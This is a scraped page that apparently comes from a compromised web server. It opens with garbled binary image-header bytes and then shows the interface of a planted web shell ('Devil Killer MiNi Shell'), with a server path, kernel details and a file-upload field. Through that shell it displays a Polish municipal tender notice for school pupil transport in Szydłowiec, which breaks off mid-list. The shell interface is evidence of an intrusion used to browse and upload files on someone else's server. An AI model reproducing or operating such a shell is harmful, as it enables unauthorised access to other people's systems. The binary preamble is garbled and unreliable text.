JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230719/0031508901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do i ze. szkół w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SZYDŁOWIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223391</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">RYNEK WIELKI 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szydłowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">486178630</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szydlowiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.szydlowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do i ze. szkół w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c98867b9-2621-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00315089</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00044001/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowóz uczniów do i ze szkół w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c98867b9-2621-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">15.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1)	administratorem Pani/Pana danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego jest Burmistrz Szydłowca, 26-500 Szydłowiec, pl. Rynek Wielki 1,<br/>2)	administrator wyznaczył Inspektora Danych osobowych, z którym można się kontaktować pod adresem e-mail: iod@szydlowiec.pl,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp,<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>8)	posiada Pani/Pan:<br/> – na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/> – na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, 22<br/> – na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust. 2 RODO,<br/> – prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>9)	nie przysługuje Pani/Panu:<br/> – w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/> – prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/> – na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZEiFO-VI.26.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>Dowożenie i odwożenie uczniów do Publicznej Szkoły Podstawowej nr 1 w Szydłowcu przy ul. Wschodniej 19 i przy ul. Folwarcznej 4 i do Publicznej Szkoły Podstawowej nr 2 przy ul. Wschodniej 57 wraz z opieką nad dowożonymi uczniami na niżej wymienionych trasach na podstawie imiennych biletów miesięcznych od dnia 4.09.2023 r do 30.06.2024r.<br/>a)	Przewóz uczniów będzie się odbywać we wszystkie dni nauki w szkołach od poniedziałku do piątku z wyłączeniem przerw świątecznych, ferii zimowych, wakacji letnich i dni dodatkowo wolnych od nauki w szkołach. <br/>b)	Trasa podczas odwozu uczniów może znacznie się różnić od trasy dowozu. Jej długość może ulec zmianie. <br/>c)	Zamawiający zastrzega sobie prawo zmiany rozkładu jazdy tj.: zmiany trasy i jej długości podczas odwozu uczniów zachowując jednocześnie niezmienną stawkę za bilet miesięczny przedstawioną w formularzu ofertowym Wykonawcy.<br/>d)	Wykonawca podczas świadczenia usług przewozowych zobowiązany jest zapewnić uczniom opiekuna na trasie dom-szkoła-dom, który będzie obecny podczas transportu. Funkcję opiekuna i kierowcy może sprawować wyłącznie osoba pełnoletnia, mająca pełną zdolność do czynności prawnej oraz niekarana. Opiekun musi być przeszkolony w zakresie udzielania pierwszej pomocy. <br/>e)	Pojazdy do przewozu uczniów muszą być przeznaczone wyłącznie do tego celu i dostosowane do liczby przewożonych uczniów. Wyklucza się łączenie uczniów z innymi osobami (np. przewozy liniowe).<br/>f)	W przypadku braku możliwości wykonania usługi Wykonawca własnym staraniem i na własny koszt zapewni pojazd zastępczy odpowiadającym przepisom prawa.<br/>g)	W przypadku nie zapewnienia przez Wykonawcę środków transportu, o których mowa w pkt f Zamawiający zleci wykonanie tej usługi innemu przewoźnikowi, obciążając kosztami Wykonawcę.<br/>h)	Zamawiający zastrzega sobie prawo zmiany tras w trakcie realizacji zamówienia.<br/>i)	Przedmiot zamówienia nie obejmuje kosztów Wykonawcy związanych z dojazdem z jego bazy do pierwszego przystanku, gdzie zaczyna się trasa dowozu, a także kosztów związanych z powrotem (bez uczniów) od końcowego przystanku do miejsca parkowania pojazdu. Powyższe koszty spoczywają na Wykonawcy. <br/>j)	Zobowiązuje się Wykonawcę do zapoznania się z Regulaminem dowozu uczniów do szkół na terenie Gminy Szydłowiec, stanowiącego załącznik do Zarządzenia Nr 114/19 Burmistrza Szydłowca z dnia 1-08-2019 dostępnego na stronie www.bip.szydlowiec.pl <br/>k)	Zobowiązuje się Wykonawcę do dostarczania biletów miesięcznych do 5 dnia każdego miesiąca.<br/>l)	Okres gwarancji - 10 miesięcy: od 4 września 2023r. do 30 czerwca 2024 r.<br/>m)	Warunki płatności: 30 dni od daty złożenia faktury.<br/><br/>Wstępny rozkład jazdy wraz z orientacyjnymi godzinami dowozu i odwozu<br/><br/>AUTOBUS A<br/>ZADANIE NR 1 <br/><br/>Kurs I <br/>6:50 Zdziechów Metków <br/>6:53 Zdziechów Lesica <br/>7:00 Zdziechów Działy <br/>7:05 Zdziechów Działy I <br/>7:10 Zdziechów Działy/Figurka <br/>7:13 Zdziechów Działy/ Ballaton <br/>Zdziechów ( Metków, Lesica, Działy) <br/>Zdziechów Działy/Ballaton Szydłowiec <br/><br/>Przewidywana liczba uczniów do dowozu około 46<br/><br/>Dowóz uczniów do Publicznej Szkoły Podstawowej Nr 1 w Szydłowcu przy ul. Wschodniej 19 i przy ul. Folwarcznej 4 i Publicznej Szkoły Podstawowej Nr 2 w Szydłowcu przy ul. Wschodniej 57 <br/>Zajęcia rozpoczynają się o godz. 8:00.<br/>Odwóz uczniów będzie się odbywał wg. przygotowanego planu odwozu. Godziny odwozów ustalone zostaną z dyrektorami poszczególnych placówek i przekazane Przewoźnikowi przed rozpoczęciem roku szkolnego 2023/2024.<br/>Istnieje możliwość zróżnicowania liczby dowożonych uczniów w czasie trwania roku szkolnego w przypadku gdy:<br/>- Dyrektor szkoły przed rozpoczęciem, bądź w czasie trwania roku szkolnego zgłosi dodatkowych uczniów do dowozu,<br/>- Dyrektor szkoły przed rozpoczęciem roku szkolnego zdecyduje, że część uczniów uczęszczała będzie do szkoły na II zmianę,<br/>- Rodzice uczniów zrezygnują z dowozu.<br/><br/>Kurs II	<br/>7:20 Zdziechów Działy/Ballaton <br/>7:30 Jankowice <br/>7:32 Jankowice/Straż <br/>7:34 Wysocko<br/>7:38 Długosz <br/>7:43 Rybianka <br/>7:47 Zielonka, Wymysłów <br/>7:54 Szydłowiec <br/><br/>Przewidywana liczba uczniów do dowozu około 24 <br/><br/>Dowóz uczniów do Publicznej Szkoły Podstawowej Nr 1 w Szydłowcu przy ul. Wschodniej 19 i Folwarcznej 4 i do Publicznej Szkoły Podstawowej Nr 2 w Szydłowcu przy ul. Wschodniej 57.<br/>Zajęcia rozpoczynają się o godz. 8:00<br/>Odwóz uczniów będzie się odbywał wg. przygotowanego planu odwozu. Godziny odwozów ustalone zostaną z dyrektorami poszczególnych placówek i przekazane Przewoźnikowi przed rozpoczęciem roku szkolnego 2023/2024.<br/>Istnieje możliwość zróżnicowania liczby dowożonych uczniów w czasie trwania roku szkolnego w przypadku gdy:<br/>- Dyrektor szkoły przed rozpoczęciem, bądź w czasie trwania roku szkolnego zgłosi dodatkowych uczniów do dowozu,<br/>- Dyrektor szkoły przed rozpoczęciem roku szkolnego zdecyduje, że część uczniów uczęszczała będzie do szkoły na II zmianę,<br/>- Rodzice uczniów zrezygnują z dowozu.<br/><br/>AUTOBUS B<br/>ZADANIE NR 2 <br/><br/>Kurs I <br/>6:50 Świerczek I <br/>6:53 Świerczek II <br/>6:56 Chustki <br/>6:59 Chustki <br/>7:02 Świerczek II <br/>7:05 Świerczek I <br/>7:15 Szydłowiec <br/><br/>Przewidywana liczba uczniów do dowozu około 49<br/><br/>Dowóz uczniów do Publicznej Szkoły Podstawowej Nr1 w Szydłowcu przy ul. Wschodniej 19 i przy ul. Folwarcznej 4 i do Publicznej Szkoły Podstawowej Nr 2 w Szydłowcu przy ul. Wschodniej 57<br/>Zajęcia rozpoczynają się o godz. 8:00.<br/>Odwóz uczniów będzie się odbywał wg. przygotowanego planu odwozu. Godziny odwozów ustalone zostaną z dyrektorami poszczególnych placówek i przekazane Przewoźnikowi przed rozpoczęciem roku szkolnego 2023/2024.<br/>Istnieje możliwość zróżnicowania liczby dowożonych uczniów w czasie trwania roku szkolnego w przypadku gdy:<br/>- Dyrektor szkoły przed rozpoczęciem, bądź w czasie trwania roku szkolnego zgłosi dodatkowych uczniów do dowozu,<br/>- Dyrektor szkoły przed rozpoczęciem roku szkolnego zdecyduje, że część uczniów uczęszczała będzie do szkoły na II zmianę,<br/>- Rodzice uczniów zrezygnują z dowozu.<br/> <br/>Kurs II <br/>7:30 Szydłówek I <br/>7:45 Szydłówek II <br/><br/>Przewidywana liczba uczniów do dowozu około 11<br/><br/>Dowóz uczniów do Publicznej Szkoły Podstawowej Nr 1 w Szydłowcu przy ul. Wschodniej 19 i do Publicznej Szkoły Podstawowej Nr 2 w Szydłowcu przy ul. Wschodniej 57 <br/>Zajęcia rozpoczynają się o godz. 8:00.<br/>Odwóz uczniów będzie się odbywał wg. przygotowanego planu odwozu. Godziny odwozów ustalone zostaną z dyrektorami poszczególnych placówek i przekazane Przewoźnikowi przed rozpoczęciem roku szkolnego 2023/2024.<br/>Istnieje możliwość zróżnicowania liczby dowożonych uczniów w czasie trwania roku szkolnego w przypadku gdy:<br/>- Dyrektor szkoły przed rozpoczęciem, bądź w czasie trwania roku szkolnego zgłosi dodatkowych uczniów do dowozu,<br/>- Dyrektor szkoły przed rozpoczęciem roku szkolnego zdecyduje, że część uczniów uczęszczała będzie do szkoły na II zmianę,<br/>- Rodzice uczniów zrezygnują z dowozu.<br/><br/>Przewidywane godziny i trasy odwozu uczniów po skończonych zajęciach szkolnych<br/>Godz. 13.30 – Szydłówek, Świerczek, Chustki, Zdziechów Działy, Jankowice, Wysocko<br/>Godz. 14.25 – Świerczek, Zdziechów Działy, Zdziechów Lesica, Zdziechów Mętków, Jankowice, Wysocko, Długosz, Rybianka, Zielonka<br/>Godz. 14.25 – Szydłówek, Chustki <br/>Godz. 15.15 – Świerczek, Chustki, Zdziechów Działy, Zdziechów Lesica, Zdziechów Mętków, Jankowice, Wysocko, <br/><br/>UWAGA: Godziny i trasy odwozu mogą ulec zmianie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu:<br/>1)	o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym;<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>c) sytuacji ekonomicznej lub finansowej,<br/>d) zdolności technicznej lub zawodowej.<br/>Określenie warunków udziału w postępowaniu:<br/>1)	Zamawiający nie określa warunków udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym, o których mowa Części IV ust. 2 pkt. 1 lit. a;<br/>2)	Wykonawca spełni warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o których mowa w Części IV ust. 2 pkt. 1 lit. b; jeżeli wykaże, że posiada licencję uprawniającą do wykonywania działalności gospodarczej w zakresie transportu drogowego osób, zgodnie z ustawą o transporcie drogowym, przy czym termin obowiązywania licencji musi obejmować cały okres trwania zamówienia;<br/>3)	Zamawiający nie określa warunków udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej, o których mowa w Części IV ust. 2 pkt. 1 lit. c;<br/>4)	Wykonawca spełni warunek dotyczący zdolności technicznej i zawodowej, o którym mowa w Części IV ust. 2 pkt. 1. lit. d, jeżeli wykaże, że:<br/>a)	wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, przewozy regularne lub regularne specjalne na podstawie zezwoleń, o których mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowych (Dz. U. z 2021 r. poz. 919 z późn. zm.) oraz ustawy z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym (Dz. U. z 2021 r. poz. 1371),<br/>b)	dysponuje autobusami przystosowanymi do przewozu osób z co najmniej 50 miejscami siedzącymi każdy. Pojazdy w chwili składania oferty muszą być dopuszczone do ruchu drogowego i posiadać aktualne badania techniczne. W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten należy spełnić łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej oraz zdolności technicznej i zawodowej Zamawiający żąda:<br/>1)	licencji uprawniającej do wykonywania działalności gospodarczej w zakresie transportu drogowego osób, zgodnie z ustawą o transporcie drogowym, przy czym termin obowiązywania licencji musi obejmować cały okres trwania zamówienia;<br/>2)	wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie- załącznik nr 5 do SWZ;<br/>3)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami- załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oprócz oświadczeń, o których mowa w Części VI ust. 1 Wykonawca do oferty zobowiązany jest załączyć m.in:<br/>1)	formularz oferty- załącznik nr 1 do SWZ;<br/>2)	pełnomocnictwo do reprezentowania Wykonawcy w przypadku Wykonawców składających ofertę wspólną;<br/>3)	zobowiązanie do udostępnienia zasobów podmiotu trzeciego, jeżeli Wykonawca w toku postępowania na takie zasoby powołuje się (jeżeli dotyczy);<br/>4)	